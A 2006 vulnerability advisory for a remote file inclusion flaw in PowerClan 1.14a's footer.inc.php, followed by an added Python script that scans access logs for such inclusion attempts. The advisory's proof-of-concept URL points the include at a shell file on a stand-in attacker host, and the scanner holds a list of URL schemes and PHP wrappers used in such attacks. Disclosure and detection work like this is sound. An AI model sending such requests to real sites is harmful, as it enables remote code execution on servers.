securityvulns SECURITYVULNS:DOC:15466
Dec 21, 2006 - 12:00 a.m.

PowerClan <= 1.14a (footer.inc.php) Remote File Include Vulnerability


+------------------------------------------------------------------------------------------
Vendor: http://www.powerscripts.org/
Affected Software: PowerClan <= 1.14a
Download: http://ftp.powerscripts.org/pc/powerclan114a.zip
Class: Remote File Inclusion
Risk: High (Remote File Execution)
Found By: nuffsaid <nuffsaid[at]newbslove.us>
+------------------------------------------------------------------------------------------
Details:

PowerClan footer.inc.php does not initialize the $settings[footer] variable before using it
to include files. Assuming register_globals = on, we can initialize the variable in a query
string and include a remote file of our choice.

Vulnerable Code:

footer.inc.php, line(s) 24:
-> 24: include($settings[footer]);

Proof Of Concept:

http://[target]/[path]/footer.inc.php?settings[footer]=http://evilsite.com/shell.php
+------------------------------------------------------------------------------------------
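
Added example, not part of the original advisory: a log check that flags direct requests to a `*.inc.php` file in which any query parameter, such as `settings[footer]`, carries a URL scheme or PHP stream wrapper as its value. The combined log format, the `/pc/` path, the wrapper list and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# URL schemes / PHP stream wrappers that make include() load non-local content.
REMOTE_VALUE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect):", re.I)
# Request target inside a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Dec/2006:10:00:00 +0000] "GET /pc/index.php?page=news HTTP/1.1" 200 4096',
    '192.0.2.66 - - [21/Dec/2006:10:00:05 +0000] "GET /pc/footer.inc.php?settings[footer]=http://example.invalid/x.txt HTTP/1.1" 200 512',
    '192.0.2.66 - - [21/Dec/2006:10:00:09 +0000] "GET /pc/footer.inc.php?settings%5Bfooter%5D=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [21/Dec/2006:10:00:12 +0000] "GET /pc/footer.inc.php?settings[footer]=footer.html HTTP/1.1" 200 128',
]

def rfi_params(target):
    """Return [(param, value)] for query parameters of a directly requested
    *.inc.php file whose decoded value starts with a URL scheme."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(".inc.php"):
        return []
    hits = []
    # parse_qsl percent-decodes names and values once (as PHP does), so
    # settings%5Bfooter%5D and settings[footer] are reported identically.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if REMOTE_VALUE.match(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Yield (line_number, param, value) for each suspicious parameter."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            for name, value in rfi_params(match.group(1)):
                yield number, name, value

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name} = {value}")
```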